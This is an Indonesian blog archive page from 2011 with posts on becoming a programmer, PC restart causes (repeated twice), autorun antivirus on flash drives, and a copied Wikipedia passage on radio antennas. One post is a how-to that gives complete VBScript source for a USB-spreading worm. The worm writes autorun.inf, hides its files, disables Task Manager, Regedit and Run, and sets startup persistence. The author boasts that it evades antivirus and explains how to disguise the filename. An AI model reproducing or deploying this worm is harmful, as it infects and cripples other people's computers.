March 2011

Wednesday, March 23, 2011

MENJADI SEORANG PROGRAMER


Untuk menjadi seorang programmer database, sebenarnya tidak begitu sulit, namun memang harus melalui tahapan-tahapan yang tidak bisa kita tinggalkan ibarat kata pepatah kalau ingin mencapai 1000 tangga ya harus dari tangga yang pertama dulu. Adapun menurut saya tahapan yang harus dilalui untuk menjadi seorang programmer adalah sebagai berikut:

1. Tahap mengenal logika program
Seorang programmer harus mampu mengembangkan logika dalam dunia nyata dan mengimplementasikannya kedalam bentuk program. Sebagaimana diketahui program komputer merupakan bentuk otomasi sesuatu. Sebelum kita dapat mengotomasi sesuatu tentu saja kita harus mengenal sesuatu tersebut. Misalnya saja kita akan membuat sebuah program otomasi pustaka, ya tentu saja kita harus mengenal terlebih dahulu sistem perpustakaan yang ideal itu bagaimana.

Setidaknya ada beberapa bentuk yang harus difahami sebagai dasar dalam pembuatan program:

Pengenalan struktur program
Struktur program merupakan cara berfikir ala program, tanpa mengenal struktur program kita akan kesulitan dalam mengembangkan program, pengenalan sintak, keyword, urut-urutan penulisan program dan sebagainya.
Dalam struktur program kita akan mengenal variabel, tipe data, bagaimana struktur pemilihan, bagaimana struktur perulangan.

2. Pemilihan bahasa pemrograman
Bahasa pemrograman yang dipilih adalah tergantung masing-masing person, ada yang suka dengan java, ada yang suka dengan vb ada yang suka dengan foxpro, powerbuilder, c++ dan lain sebagainya. Tapi tentu saja pembuatan program tidak hanya melulu masalah suka saja. Namun lebih kepada kemampuan dari masing-masing program.

Si programmer harus bijak memilih bahasa pemrograman yang akan digunakan, java misalnya terkenal dengan fitur frameworknya yang bisa digunakan di berbagai sistem operasi, C++ merupakan bahasa induknya bahasa, yang bisa membuat bahasa pemrograman lain, bahkan sistem operasi, foxpro terkenal dengan databasenya, delphi sangat terkenal dengan kemampuannya dalam pengontrolan alat, powerbuilder terkenal dengan program yang minus coding, visual basic terkenal dengan kemudahan dan keluwesannya.

Tentu saja tidak ada bahasa pemrograman yang terbaik, semuanya tergantung kepada kebutuhan si pemakai, bagi pengguna bahasa pemrograman tertentu, bahasa itulah yang terbaik.
Bahasa pemrograman yang dipilih sebaiknya bahasa yang abadi, maksudnya selalu disupport oleh perkembangan hardware komputer yang perkembangannya tidak tanggung-tanggung. Boleh jadi pada masa sekarang ini yang lagi trend adalah bahasa pemrograman dengan kerangka kerja lintas sistem operasi seperti java dan .Net yang juga sudah ikut-ikutan.

Dalam perkiraan, pengembangan bahasa pemrograman web akan sangat berkembang, karena bahasa pemrograman jenis ini tidak membutuhkan settingan khusus pada komputer client, dengan bahasa pemrograman yang mendukung fitur server side seperti php, asp, dan jsp maka installasi cukup hanya dilakukan pada server saja. Selanjutnya client tinggal mengakses menggunakan browser seperti internet explorer, mozilla dan lain sebagainya, jenis teknologi yang murah dalam pengembangan dan impelementasi dibandingkan dengan pemrograman desktop.

Tentunya akan sulit untuk menguasai seluruh bahasa pemrograman, bukan bermaksud pesimis, misalnya saja untuk menguasai VB .Net saya membaca sebuah e-book yang tebalnya 500 lembar, bayangkan saja betapa butuh waktunya untuk memahami buku tersebut, itupun baru satu sumber saja. Kalaupun bisa nantinya kita hanya akan memahami kulit-kulit saja dari pemrograman tersebut, saran saya pilihlah satu tapi matang.

3. Memilih perangkat pendukung
Setelah memahami logika program dan memilih bahasa pemrograman yang tepat tentunya kita membutuhkan software dan hardware pendukung yang tepat,

Perangkat database
Ada sebagian bahasa pemrograman yang telah memiliki database yang include dengan bahasanya sendiri, namun karena perkembangan teknologi database sendiri, yang memungkinkan mereka untuk membuat bahasa pemrograman sendiri, mau tak mau programmer sebaiknya juga mengenal teknologi database yang relevan seperti MySQL, Access, Oracle, Sybase, SQL Server, dan lain sebagainya.

Seperti bahasa pemrograman, masing-masing database mempunyai fitur yang menarik bagi si pemakai, namun karena fungsi pokoknya sebagai penyimpan data, kita tida sesaklek belajar bahasa pemrograman, karena biasanya database mempunyai konsep yang sama, ada database, ada table, ada query ada view, trigger, stored procedure dan lain sebagainya.
SQL (Structured Query Language) merupakan komponen penting didalam pemrograman, pemrosesan data akan sangat lambat jika si programmer terlalu mengandalkan logika sekuensial dalam mengakses data.

Perangkat Report
Sebagaimana kita tahu, pembuatan program database apa saja selalu berakhir pada pembuatan laporan. Laporan dimaksudkan untuk mengolah data sehingga menjadi informasi yang nantinya akan disajikan kepada para pengguna informasi yang membutuhkan. Baik gunanya untuk mengambil keputusan, audit, perbandingan dan lain sebagainya.

Sebagian bahasa pemrograman memiliki perangkat untuk membuat report sendiri, seperti data report pada visual basic, quick report pada delphi dan lain sebagainya, namun ini tidak membuat pengembang pembuatan software laporan menjadi berkecil hati. Malah menjadi tantangan tersendiri untuk menyajikan software pembuat laporan yang bahkan melebihi software report yang ada pada bahasa pemrograman yang telah terpasang.
Crystal report merupakan salah satu perangkat software pembuat laporan yang sangat terkenal, kompabilitasnya untuk digabungkan dengan berbagai bahasa pemrograman membuat posisinya selalu teratas dalam perangat pembuatan laporan.

Perangat Installasi
Deployment merupakan tahap final dalam pembuatan program, setelah program dibuat, dikompilasi tentu saja perlu disebar luaskan, para pengguna akan cenderung tidak tertarik jika installasi software yang digunakan sangat rumit. Kecuali tentu saja software yang memang tidak diragukan lagi ketangguhannya, oracle termasuk rumit dalam installasi.
Seperti database dan laporan, banyak pengembang-pengembang software yang menyediakan perangkat installasi tersendiri, install shield, NSIS merupakan nama-nama software yang dirancang untuk mengemas aplikasi sehingga lebih cantik dan mudah dalam proses penginstallasiannya.
Kenapa perlu installasi?, harusnya semua software bahasa pemrograman sudah menyediakan paket installasinya, memang benar, namun hal tersebut tidak akan mumpuni jika kita menggunakan banyak perangkat luar dari bahasa pemrograman itu sendiri, sebab masing-masing perangkat tentu saja membutuhkan file-file seperti dll, ocx yang berbeda masing-masingnya. Dengan perangkat installasi semua kebutuhan itu bisa dibungkus menjadi satu buah kumpulan file installasi saja.

4. Menjadi terkenal
Kemampuan yang setinggi apapun jika tidak dipublikasikan dengan baik, hanya akan menjadi musium saja. Untuk itu perlu mengaplikasikan ilmu yang telah didapat dalam dunia kerja. Mulailah dulu dengan menjadi tangan kanan, carilah kenalan sebanyak-banyaknya terutama yang mempunyai hubungan dengan pelaku pasar (pelanggan).
Jalin dulu kerjasama, kenalan kita yang mengurus segala bentuk urusan administrasi dengan pelanggan, kemudian kita yang bekerja. Tidak apa-apa, tak ada yang langsung jadi bintang kok, minimal harus ikut indonesian idol dulu. 70-30 rasanya pembagian yang cukup adil, kecuali mungkin dia mintak lebih, itu tergantung besar kecilnya proyek dan kemauan kita saja.

Yang jelas orientasi kita pertama adalah menambah khasanah ilmu, ingat prinsip “latihan setahun masih kalah dengan pertandingan sehari”. Dengan mengerjakan proyek program secara langsung, kita akan mendapatkan tambahan ilmu yang tidak tanggung-tanggung, sebab teori selalu tidak sama dengan praktek. Ada kebutuhan yang selama ini kita pandang tidak perlu ternyata menjadi bagian kritis bagi pelanggan.
Setelah berpetualang menjadi tangan kanan, lambat laun para pelanggan akan mulai menghubungi kita secara langsung, ingat nomor hp dan alamat email jangan sampai diganti, sebab bisa saja menghilangkan sekian belas projek. Ketika proyek sudah murni ditangan kita, satu hal yang harus dijaga adalah “kepercayaan para pelanggan”, sekali kita berbuat salah yang tidak sesuai maka rusaklah nama, nama baik tidak bisa diganti dengan apapun. Namun itu tidak membuat kita menjadi murahan, lakukan sesuai dengan permintaan, jika ada permintaan tambahan, konfirmasikan kembali bahwa ini permintaan tambahan yang tentu saja perlu honor tambahan.
Prinsip terutama selagi kita masih pemula adalah “jangan pernah bilang tidak!”, manfaatkan kenalan yang kita punya, misalkan pelanggan butuh pengadaan hardware sedangkan kita tidak mampu, gunakan jasa kenalan, tapi tetap dengan mengatas namakan kita, siapa sih yang ndak mau berbisnis asalkan saling menguntungkan.

Berikan service-service yang memuaskan, satu saja pelanggan merasa puas, mereka akan bercerita dengan bangga tentang kerjasamanya dengan kita, tentu saja hp kita mulai banyak deringannya. Pastikan batrai jangan sampai low, kadang kala pelanggan kita ada yang mempunyai gengsi tinggi lho…
Persiapkan source code yang anti maling, maksudnya bebaskan para calon pengguna untuk menginstall program yang kita buat, tapi buat settingan waktu kapan program itu mati dengan sendirinya, kalau tidak kita bisa rugi. Setidaknya calon pengguna sudah mencoba, tertarik atau tidak itu tergantung lobi dan nasib kita tentunya.

Berbisnis dengan swasta kelas menengah memerlukan upaya yang cukup sabar, kenapa?, biasanya dananya cetek tapi mintanya segenap-genapnya. Ketika orderan sudah cukup banyak mulailah menggunakan perangkat hukup seperti notaris, mulailah bekerja berdasarkan kontrak, sehingga kita bisa meminimalkan permintaan tambahan dari pengguna dengan memanfaatkan kontrak kerja sama yang telah dibuat. Biasanya jika kontrak kerjasama telah ditandatangani notaris, maka para pelanggan tidak akan mau macam-macam, kita juga tidak akan dipandang sebelah mata.
Berbisnis dengan pemerintah kudu lebih sabar lagi, karena project harus selesai dulu baru dana bisa dikucurkan, kalaupun sudah selesai biasanya menunggu dana dari KPKN dulu baru bisa dicairkan bisa berbulan-bulan, tapi yang jelas bisnis dengan kantor pemerintah uangnya lebih pasti. Tapi kudu berhati-hati dengan oknum-oknum yang tidak bertanggung jawab, jangan terjebak dengan meja ini meja itu, apalagi meja hijau, eaeaeaeae….

5. Kembangkan bisnis
Ketika kita sudah punya nama dan relasi yang cukup, mulailah merekrut tenaga-tenaga potensial, dekati lingkungan kampus. Cari bibit-bibit programmer unggul dan ajaklah kerjasama, tenaga muda biasanya haus pengalaman, usahakan penduduk setempat agar bisa berlanjut, berikan kebutuhan mereka seperti hardisk yang besar, laptop sehingga mereka betah. Kita kemudian bertindak sebagai pencari kerja, dan biarkan tenaga muda yang bekerja, karena bagi mereka sekarang khasanah ilmu merupakan hal yang terbaik.Usahakan untuk pengkaderan, artinya pekerjaan jangan hanya tertumpuk pada satu orang saja, agar jika terjadi masalah, tidak akan kelimpungan.
Pada masa ini, jika sebelumnya lisensi software belum ada, usahakan pada masa ini sudah ada, karena kegiatan yang dilakukan seharusnya selalu dibawah lindungan hukum, dengan memanfaatkan jasa notaris tadi, jangan nanti malah ketangkap membajak lagi

Sunday, March 20, 2011

CARA MEMBUAT VIRUS DARI NOTEPAD




Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next’//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set kalong = createobject(“WScript.Shell”)

‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”

‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(“Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.

He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

Wednesday, March 16, 2011

CARA MEMBUAT ANTIVIRUS DARI FLASHDISK


CARA MEMBUAT ANTIVIRUS DARI FLASHDISK

Pasti anda jengkel dengan Virus yang otomatis menginfeksi Flash Disk Anda saat Anda colokkan USB Flash Disk Anda ke komputer yang terinfeksi virus?
Bagaimana tidak, kita akali saja dengan Membuat Anti Virus AutoRun dari USB Flash Disk?
Seringkali Virus akan membuat file autorun.inf yang ber-attribute file hidden dan system (atau bisa juga termasuk file virus trojan - server)
file autorun.inf inilah command atau pemicu tereksekusinya file induk dan library virus/trojan yang sudah bersarang di komputer lokal tempat anda mencolokkan Flash Disk, berikut cara mudah membuat antivirus di flash disk:
Pertama-tama buatlah AUTORUN untuk menjalangkan antivirus pada flashdisk, caranya copy
antivirus yg berukurang kecil ke flashdisk anda contonya SMADAV,ANSAV….dll (contoh kali ini saya menggunakan SMADAV karena ukurangnya kecil sekitar 3 MB). Sekarang kita membuat script / kode di notepad
============potong disini============
[AUTORUN]
open=nama antivirus.exe
shellexecute=nama antivirus.exe
shell\Scan Virus dulu coy:-)_!!!\command=nama antivirus.exe
shell=Scan Virus dulu coy:-)_!!!
============potong disini============
Kemuadian save dengan nama “autorun.inf” di flashdisk anda (tidak memakai tanda kutip) sekarang anda copy saja antivirusnya ke flashdisk. Kalau anda ingin scan antivirusnya tinggal di double klik saja pada drive flashdisk dan kalau anda ingin membuka flashdisk, klik kanan dan pilih open Diatas kata auto play anda juga dapat menambahkan kata-kata perintah yang berisi mengaktifkan antivirus di flashdisk anda dengan format di notepad:
———————————
- shell\kata anda\command=(nama antivirus.exe)
- shell=(kata anda)
———————————
Untuk menghilangkan file AUTORUN di flashdisk , kita harus klik kanan dan pilih properties kemudian klik hidden. Atau dengan cara:
- buka RUN dari start menu
- terus ketik cmd
- Kemudian kita masuk kedalam drive fdnya (biasanya di drive f:)
- Setelah kita tulis commandnya.
f:\>attrib +h +s nama antivirusnya.exe (buat sembunyiin antivirusnya)
f:\>attrib +h +s autorun.inf (buat hidden file autorunnya)
Catatan :
jangan di simpan di dalam folder tapi kalu akan di simpan didalam folder ini scripnya
contoh nama foldernya :Smadav
lalu nama anti virusnya : SMARTP.exe
——————————————————-
[AUTORUN]
open=Smadav/SMARTP.exe
shellexecute=Smadav/SMARTP.exe
shell\Scan Virus dulu coy:-)_!!!\command=Smadav/SMARTP.exe
shell=Scan Virus dulu coy:-)_!!!
——————————————————–
lalu save dengan nama autorun.inf
tambahan kalau akan mengganti icon flashdisknya anda ini caranya
contoh nama icon : icone.ico
——————————————————–
[AUTORUN]
open=Smadav/SMARTP.exe
shellexecute=Smadav/SMARTP.exe
shell\Scan Virus dulu coy:-)_!!!\command=Smadav/SMARTP.exe
shell=Scan Virus dulu coy:-)_!!!
icon=icone.ico
——————————————————–
kembali save dengan nama autorun.inf
Selesai... beginilah cara mudah membuat antivirus di flash disk

Wednesday, March 9, 2011

PENYEBAB KOMPUTER ME RESTART DENGAN SENDIRI NYA


Saat anda lagi asyik maen game atau sedang konsentrasi mengerjakan sesuatu di komputer, tiba-tiba komputer anda restart dengan sendirinya tanpa pesan error atau nge-hang terlebih dahulu.
Ngga ada angin ngga ada hujan, komputer langsung restart. Dan yang bikin kesel, banyak file kerjaan yang belum disave. Pernahkah hal ini terjadi pada anda? Berikut adalah beberapa penyebabnya:

Terlalu Panas Didalam
Hal inilah yang kemungkinan besar menyebabkan PC anda restart sendiri. CPU terlalu panas akibat terlalu lama dari semestinya. Atau bisa jadi karena kipas dalam CPU mandeg dan tidak mau berputar. Coba lihat CPU temperatur di BIOS yang biasanya ada dalam “PC Health Status.” Temperatur sebesar 35C – 40C adalah normal. 40C – 47C berarti mulai memanas. 47C – 50C panas dan anda harus mengistirahatkan PC anda untuk cooling down. Kalau perlu periksa juga kipas pada CPU. Dan yang pasti, jangan sampai CPU anda mendekati atau bahkan temperaturnya mencapai 79 derajat celsius. Bentar lagi meledak tuh. Pastikan CPU anda selalu ada dalam temperatur 35C – 40C. Kalau anda ngga mau repot masuk BIOS untuk cek temperature. Silahkan download Speedfan untuk mengecek CPU temperatur secara realtime.
SOLUSI: Jika CPU anda sudah terlanjur panas, harus dibongkar nih CPUnya. Anda bisa melakukannya sendiri koq. Buka casing cpu dan nyalakan komputer sesaat. Coba perhatikan semua kipasnya yang ada (terutama kipas processor). Apakah putarannya normal? Cepat atau lambat? Atau ngga jalan sama sekali?

Jika ada yang putarannya lambat, anda harus periksa kipas tersebut. Coba anda putar-putar kipas tsb (pc dalam keadaan mati tentunya). Jika terasa berat, cabut kipas tsb dan semprot dengan 4WD lalu putar-putar sampai kotorannya keluar dan putarannya lancar kembali.
Untuk kipas yang tidak jalan sama sekali, periksa dulu apakah kabelnya tersambung ke power supply atau tidak. Kalau ya, lakukan seperti langkah diatas. INGAT: Sering-sering perhatikannya temperatur CPU-nya!

Bad Memory
Suhu komputer anda normal tapi tetap suka restart sendiri? Kemungkinan kedua adalah bad memory atau bad RAM. Anda harus mengecek RAM anda. Caranya lakukan pengetesan dengan menggunakan Memory Diagnosis Tools. Salah satunya adalah Windows Memory Diagnostic. Jalankan dulu executeable file-nya pada Windows lalu pilih CD atau Floppy Disk Install.

Jika anda memilih ‘Create Startup Disk’, silahkan anda masukan floppy disk ke diskdrive anda. Setelah proses selesai restart komputer anda dan ganti ‘First Boot’ ke ‘Floppy Disk’ pada BIOS. Setelah itu, Windows Memory Diagnostic akan men-scan RAM anda.

Jika anda memilih ‘Save CD Image to Disk’, klik tombol tersebut dan save file image di harddisk komputer anda. Lalu dengan menggunakan CD Burning program seperti Nero, burn file image tersebut ke dalam CD. Untuk mudahnya gunakan Nero SmartStart dan pilih ‘Burn Image to Disc’ pada bagian ‘Copy and Backup’. Setelah cd selesai diburn, restart komputer dan boot dari cd lalu scan memory/ram anda.
Kalau dari hasil diagnosa mengatakan ada bad memory berarti mau ngga mau anda harus ganti ram anda.
Program lain untuk mendiagnosa bad memory adalah Memtest86+ dan Docmem.
Virus dan Spyware

Dua sejoli ini bisa juga menjadi biang kerok penyebab komputer restart sendiri. Coba scan komputer anda dengan menggunakan antivirus dan antispyware. Kalau belum punya, daftarnya bisa dilihat disini.

Bad Power
Kalau ketiga hal diatas bukan masalahnya, berarti power supply CPU anda sudah lemah dan harus diganti. Tandanya: komputer selalu nge-restart dalam interval yang tidak pasti. Kadang baru dipake udah nge-restart tapi kadang udah lama dipake baru nge-restart. Terpaksa anda harus beli yang baru dan masing greng!

Jangan Repot-Repot Ah!
Sebetulnya, Windows-lah yang melakukan restart secara tiba-tiba tanpa memberi tahu anda. Hal ini dilakukannya untuk menghindari kerusakan pada komputer. Begitu ada yang ngga beres dengan komputer anda, windows akan langsung nge-restart.

Kalau anda tidak ingin windows me-restart komputer jika ada masalah karena anda akan melakukannya secara manual, lakukan langkah berikut:
1. Klik kanan icon My Computer
2. Pilih tab Advanced
3. Klik Setting pada bagian “Startup and Recovery”
4. Uncheck Automatically Restart
5. Tekan OK

Referensi http://www.komputeranda.com

PENYEBAB KOMPUTER ME RESTART DENGAN SENDIRI NYA


Saat anda lagi asyik maen game atau sedang konsentrasi mengerjakan sesuatu di komputer, tiba-tiba komputer anda restart dengan sendirinya tanpa pesan error atau nge-hang terlebih dahulu.
Ngga ada angin ngga ada hujan, komputer langsung restart. Dan yang bikin kesel, banyak file kerjaan yang belum disave. Pernahkah hal ini terjadi pada anda? Berikut adalah beberapa penyebabnya:

Terlalu Panas Didalam
Hal inilah yang kemungkinan besar menyebabkan PC anda restart sendiri. CPU terlalu panas akibat terlalu lama dari semestinya. Atau bisa jadi karena kipas dalam CPU mandeg dan tidak mau berputar. Coba lihat CPU temperatur di BIOS yang biasanya ada dalam “PC Health Status.” Temperatur sebesar 35C – 40C adalah normal. 40C – 47C berarti mulai memanas. 47C – 50C panas dan anda harus mengistirahatkan PC anda untuk cooling down. Kalau perlu periksa juga kipas pada CPU. Dan yang pasti, jangan sampai CPU anda mendekati atau bahkan temperaturnya mencapai 79 derajat celsius. Bentar lagi meledak tuh. Pastikan CPU anda selalu ada dalam temperatur 35C – 40C. Kalau anda ngga mau repot masuk BIOS untuk cek temperature. Silahkan download Speedfan untuk mengecek CPU temperatur secara realtime.
SOLUSI: Jika CPU anda sudah terlanjur panas, harus dibongkar nih CPUnya. Anda bisa melakukannya sendiri koq. Buka casing cpu dan nyalakan komputer sesaat. Coba perhatikan semua kipasnya yang ada (terutama kipas processor). Apakah putarannya normal? Cepat atau lambat? Atau ngga jalan sama sekali?

Jika ada yang putarannya lambat, anda harus periksa kipas tersebut. Coba anda putar-putar kipas tsb (pc dalam keadaan mati tentunya). Jika terasa berat, cabut kipas tsb dan semprot dengan 4WD lalu putar-putar sampai kotorannya keluar dan putarannya lancar kembali.
Untuk kipas yang tidak jalan sama sekali, periksa dulu apakah kabelnya tersambung ke power supply atau tidak. Kalau ya, lakukan seperti langkah diatas. INGAT: Sering-sering perhatikannya temperatur CPU-nya!

Bad Memory
Suhu komputer anda normal tapi tetap suka restart sendiri? Kemungkinan kedua adalah bad memory atau bad RAM. Anda harus mengecek RAM anda. Caranya lakukan pengetesan dengan menggunakan Memory Diagnosis Tools. Salah satunya adalah Windows Memory Diagnostic. Jalankan dulu executeable file-nya pada Windows lalu pilih CD atau Floppy Disk Install.

Jika anda memilih ‘Create Startup Disk’, silahkan anda masukan floppy disk ke diskdrive anda. Setelah proses selesai restart komputer anda dan ganti ‘First Boot’ ke ‘Floppy Disk’ pada BIOS. Setelah itu, Windows Memory Diagnostic akan men-scan RAM anda.

Jika anda memilih ‘Save CD Image to Disk’, klik tombol tersebut dan save file image di harddisk komputer anda. Lalu dengan menggunakan CD Burning program seperti Nero, burn file image tersebut ke dalam CD. Untuk mudahnya gunakan Nero SmartStart dan pilih ‘Burn Image to Disc’ pada bagian ‘Copy and Backup’. Setelah cd selesai diburn, restart komputer dan boot dari cd lalu scan memory/ram anda.
Kalau dari hasil diagnosa mengatakan ada bad memory berarti mau ngga mau anda harus ganti ram anda.
Program lain untuk mendiagnosa bad memory adalah Memtest86+ dan Docmem.
Virus dan Spyware

Dua sejoli ini bisa juga menjadi biang kerok penyebab komputer restart sendiri. Coba scan komputer anda dengan menggunakan antivirus dan antispyware. Kalau belum punya, daftarnya bisa dilihat disini.

Bad Power
Kalau ketiga hal diatas bukan masalahnya, berarti power supply CPU anda sudah lemah dan harus diganti. Tandanya: komputer selalu nge-restart dalam interval yang tidak pasti. Kadang baru dipake udah nge-restart tapi kadang udah lama dipake baru nge-restart. Terpaksa anda harus beli yang baru dan masing greng!

Jangan Repot-Repot Ah!
Sebetulnya, Windows-lah yang melakukan restart secara tiba-tiba tanpa memberi tahu anda. Hal ini dilakukannya untuk menghindari kerusakan pada komputer. Begitu ada yang ngga beres dengan komputer anda, windows akan langsung nge-restart.

Kalau anda tidak ingin windows me-restart komputer jika ada masalah karena anda akan melakukannya secara manual, lakukan langkah berikut:
1. Klik kanan icon My Computer
2. Pilih tab Advanced
3. Klik Setting pada bagian “Startup and Recovery”
4. Uncheck Automatically Restart
5. Tekan OK

Referensi http://www.komputeranda.com

Wednesday, March 2, 2011

ANTENA RADIO


Antena (radio)
Dari Wikipedia bahasa Indonesia, ensiklopedia bebas
Langsung ke: navigasi, cari
Untuk kegunaan lain dari Antena, lihat Antena
"Tirai" antena gelombang pendek
Dibidang elektronika definisi antena adalah "transformator / struktur transmisi antara gelombang terbimbing (saluran transmisi) dengan gelombang ruang bebas atau sebaliknya. Sekarang antena adalah salah satu elemen penting yang harus ada pada sebuah teleskop radio, TV, radar, dan semua alat komunikasi lainnya yang menggunakan sinyal". Sebuah antena adalah bagian vital dari suatu pemancar atau penerima yang berfungsi untuk menyalurkan sinyal radio ke udara.Bentuk antena bermacam macam sesuai dengan desain, pola penyebaran dan frekuensi dan gain. Panjang antenna secara efektif adalah panjang gelombang frekuensi radio yang dipancarkannya. Antenna setengah gelombang adalah sangat poluler karena mudah dibuat dan mampu memancarkan gelombang radio secara efektif.
Daftar isi
[sembunyikan]
• 1 Fungsi
• 2 Karakter antena
o 2.1 Pola radiasi
o 2.2 Gain
o 2.3 Polarisasi
• 3 Penggunaan antena
o 3.1 Penggunaan antena pada radio
o 3.2 Penggunaan antena pada televisi
o 3.3 Penggunaan antena pada radar
• 4 Jenis
o 4.1 Berdasarkan fungsi
o 4.2 Berdasarkan gainnya
o 4.3 Berdasarkan polarisasinya
o 4.4 Berdasarkan bentuknya
• 5 Referensi
• 6 Pranala luar

Fungsi
Fungsi antena adalah untuk mengubah sinyal listrik menjadi sinyal elektromagnetik, lalu meradiasikannya (Pelepasan energy elektromagnetik ke udara / ruang bebas). Dan sebaliknya, antena juga dapat berfungsi untuk menerima sinyal elektromagnetik (Penerima energy elektromagnetik dari ruang bebas ) dan mengubahnya menjadi sinyal listrik. Pada radar atau sistem komunikasi satelit, sering dijumpai sebuah antena yang melakukan kedua fungsi (peradiasi dan penerima) sekaligus. Namun, pada sebuah teleskop radio, antena hanya menjalankan fungsi penerima saja.
Karakter antena
